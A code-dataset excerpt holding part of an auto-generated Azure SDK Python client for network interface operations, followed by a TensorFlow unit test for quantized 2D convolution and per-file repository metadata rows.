'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'}
def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name,
virtual_machine_scale_set_name,
virtualmachine_index,
network_interface_name,
expand=None,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
url = self.get_virtual_machine_scale_set_network_interface.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'}
def _delete_initial(
self,
resource_group_name,
network_interface_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
url = self._delete_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def begin_delete(
self,
resource_group_name,
network_interface_name,
**kwargs
):
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def get(
self,
resource_group_name,
network_interface_name,
expand=None,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def _create_or_update_initial(
self,
resource_group_name,
network_interface_name,
parameters,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
url = self._create_or_update_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {}
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def begin_create_or_update(
self,
resource_group_name,
network_interface_name,
parameters,
**kwargs
):
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def list_all(
self,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'}
def list(
self,
resource_group_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'}
def _get_effective_route_table_initial(
self,
resource_group_name,
network_interface_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
url = self._get_effective_route_table_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'}
def begin_get_effective_route_table(
self,
resource_group_name,
network_interface_name,
**kwargs
):
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'}
def _list_effective_network_security_groups_initial(
self,
resource_group_name,
network_interface_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
url = self._list_effective_network_security_groups_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'}
def begin_list_effective_network_security_groups(
self,
resource_group_name,
network_interface_name,
**kwargs
):
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'}
| true | true |
f7fa264461ee7a1a80d8e7c0cf7d71c4d23225bf | 7,521 | py | Python | tensorflow/python/ops/quantized_conv_ops_test.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 52 | 2018-11-12T06:39:35.000Z | 2022-03-08T05:31:27.000Z | tensorflow/python/ops/quantized_conv_ops_test.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 2 | 2018-12-04T08:35:40.000Z | 2020-10-22T16:17:39.000Z | tensorflow/python/ops/quantized_conv_ops_test.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 17 | 2019-03-11T01:17:16.000Z | 2022-02-21T00:44:47.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for quantized convolutional operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class Conv2DTest(test.TestCase):
def __init__(self, method_name="runTest"):
super(Conv2DTest, self).__init__(method_name)
def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
expected):
"""Verifies the output values of the convolution function.
Args:
tensor_in_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
stride: Stride.
padding: Padding type.
expected: An array containing the expected operation outputs.
"""
total_size_1 = 1
total_size_2 = 1
for s in tensor_in_sizes:
total_size_1 *= s
for s in filter_in_sizes:
total_size_2 *= s
# Initializes the input tensor with array containing incrementing
# numbers from 1.
x1 = np.array([f for f in range(1, total_size_1 + 1)])
x1 = x1.astype(np.uint8).reshape(tensor_in_sizes)
x1_min = 0.0
x1_max = 255.0
x2 = np.array([f for f in range(1, total_size_2 + 1)]).astype(np.uint8)
x2 = x2.astype(np.uint8).reshape(filter_in_sizes)
x2_min = 0.0
x2_max = 255.0
with self.cached_session(use_gpu=False) as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtypes.quint8)
t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtypes.quint8)
conv = nn_ops.quantized_conv2d(
t1,
t2,
out_type=dtypes.qint32,
strides=[1, stride, stride, 1],
padding=padding,
min_input=x1_min,
max_input=x1_max,
min_filter=x2_min,
max_filter=x2_max)
value = sess.run(conv)
quantized_output = value[0]
output_min = value[1]
output_max = value[2]
float_output = self._QuantizedOutputToFloat(quantized_output, output_min,
output_max)
self.assertArrayNear(expected, float_output.flatten(), 1.0)
self.assertEqual(value[0].shape, conv[0].get_shape())
def _assertQuantizedArrayEquals(self, iarray1, iarray2):
for i1, i2 in zip(iarray1, iarray2):
self.assertTrue(i1 == i2)
def _QuantizedOutputToFloat(self, quantized, quantized_min, quantized_max):
number_of_bits = 32
number_of_steps = 1 << number_of_bits
range_adjust = (number_of_steps / (number_of_steps - 1.0))
quantized_range = ((quantized_max - quantized_min) * range_adjust)
range_scale = (quantized_range / number_of_steps)
lowest_quantized = -(1 << (number_of_bits - 1))
result = np.array([(quantized_min +
((float(x) - lowest_quantized) * range_scale))
for x in quantized.flatten()])
return result
def testConv2D1x1Filter(self):
# Our generated input is [batch, rows, cols, depth], and looks like this:
# (1,2,3) (4,5,6) (7,8,9)
# (10,11,12) (13,14,15) (16,17,18)
# The filter data is:
# (1,4,7) (2,5,8) (3,6,9)
# That means the calculations are:
# 1*1+2*4+3*7=30
# 1*2+2*5+3*8=36
# 1*3+2*6+3*9=42
# 4*1+5*4+6*7=66
# 4*2+5*5+6*8=81
# 4*3+5*6+6*9=96
# 7*1+5*8+6*9=102
# 7*2+8*5+9*8=126
# 7*3+8*6+9*9=150
# 10*1+11*4+12*7=138
# 10*2+11*5+12*8=171
# 10*3+11*6+12*9=204
# 13*1+14*4+15*7=174
# 13*2+14*5+15*8=216
# 13*3+14*6+15*9=258, clamped to 255
# 16*1+17*4+18*7=210
# 16*2+17*5+18*8=261, clamped to 255
# 16*3+17*6+18*9=312, clamped to 255
# Because the output shift is zero, we call the non-optimized reference
# path for the convolution.
expected_output = [
30, 36, 42, 66, 81, 96, 102, 126, 150, 138, 171, 204, 174, 216, 258,
210, 261, 312
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
# Our generated input is [batch, rows, cols, depth], and looks like this:
# (1,2,3) (4,5,6) (7,8,9)
# (10,11,12) (13,14,15) (16,17,18)
# The filter data is [filter_height, filter_width, depth, filter_count]:
# ( 1, 4, 7) (10, 13, 16)
# (19,22,25) (28, 31, 34)
# -
# ( 2, 5, 8) (11, 14, 17)
# (20,23,26) (29, 32, 35)
# -
# ( 3, 6, 9) (12, 15, 18)
# (21,24,27) (30, 33, 36)
# The raw accumulated totals are:
# 1*1+2*4+3*7+4*10+5*13+6*16+10*19+11*22+12*25+13*28+14*31+15*34=2271
# 1*2+2*5+3*8+4*11+5*14+6*17+10*20+11*23+12*26+13*29+14*32+15*35=2367
# 1*3+2*6+3*9+4*12+5*15+6*18+10*21+11*24+12*27+13*30+14*33+15*36=2463
# 4*1+5*4+6*7+7*10+8*13+9*16+13*19+14*22+15*25+16*28+17*31+18*34=2901
# 4*2+5*5+6*8+7*11+8*14+9*17+13*20+14*23+15*26+16*29+17*32+18*35=3033
# 4*3+5*6+6*9+7*12+8*15+9*18+13*21+14*24+15*27+16*30+17*33+18*36=3165
# The expected values are taken from the raw totals and rescaled to fit into
# eight bits.
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
# With a shift of 21, we should execute the optimized path here.
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
# With a shift of 21, we should execute the optimized path here.
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
# With a shift of 21, we should execute the optimized path here.
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=2,
padding="SAME",
expected=expected_output)
if __name__ == "__main__":
test.main()
| 36.509709 | 80 | 0.62505 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class Conv2DTest(test.TestCase):
def __init__(self, method_name="runTest"):
super(Conv2DTest, self).__init__(method_name)
def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
expected):
total_size_1 = 1
total_size_2 = 1
for s in tensor_in_sizes:
total_size_1 *= s
for s in filter_in_sizes:
total_size_2 *= s
x1 = np.array([f for f in range(1, total_size_1 + 1)])
x1 = x1.astype(np.uint8).reshape(tensor_in_sizes)
x1_min = 0.0
x1_max = 255.0
x2 = np.array([f for f in range(1, total_size_2 + 1)]).astype(np.uint8)
x2 = x2.astype(np.uint8).reshape(filter_in_sizes)
x2_min = 0.0
x2_max = 255.0
with self.cached_session(use_gpu=False) as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtypes.quint8)
t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtypes.quint8)
conv = nn_ops.quantized_conv2d(
t1,
t2,
out_type=dtypes.qint32,
strides=[1, stride, stride, 1],
padding=padding,
min_input=x1_min,
max_input=x1_max,
min_filter=x2_min,
max_filter=x2_max)
value = sess.run(conv)
quantized_output = value[0]
output_min = value[1]
output_max = value[2]
float_output = self._QuantizedOutputToFloat(quantized_output, output_min,
output_max)
self.assertArrayNear(expected, float_output.flatten(), 1.0)
self.assertEqual(value[0].shape, conv[0].get_shape())
def _assertQuantizedArrayEquals(self, iarray1, iarray2):
for i1, i2 in zip(iarray1, iarray2):
self.assertTrue(i1 == i2)
def _QuantizedOutputToFloat(self, quantized, quantized_min, quantized_max):
number_of_bits = 32
number_of_steps = 1 << number_of_bits
range_adjust = (number_of_steps / (number_of_steps - 1.0))
quantized_range = ((quantized_max - quantized_min) * range_adjust)
range_scale = (quantized_range / number_of_steps)
lowest_quantized = -(1 << (number_of_bits - 1))
result = np.array([(quantized_min +
((float(x) - lowest_quantized) * range_scale))
for x in quantized.flatten()])
return result
def testConv2D1x1Filter(self):
expected_output = [
30, 36, 42, 66, 81, 96, 102, 126, 150, 138, 171, 204, 174, 216, 258,
210, 261, 312
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=2,
padding="SAME",
expected=expected_output)
if __name__ == "__main__":
test.main()
| true | true |
f7fa267b884d43f4d2627259e21a7a856b7d64f1 | 4,603 | py | Python | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/operations/__init__.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2018-07-23T08:59:24.000Z | 2018-07-23T08:59:24.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/operations/__init__.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2018-11-29T14:46:42.000Z | 2018-11-29T14:46:42.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/operations/__init__.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
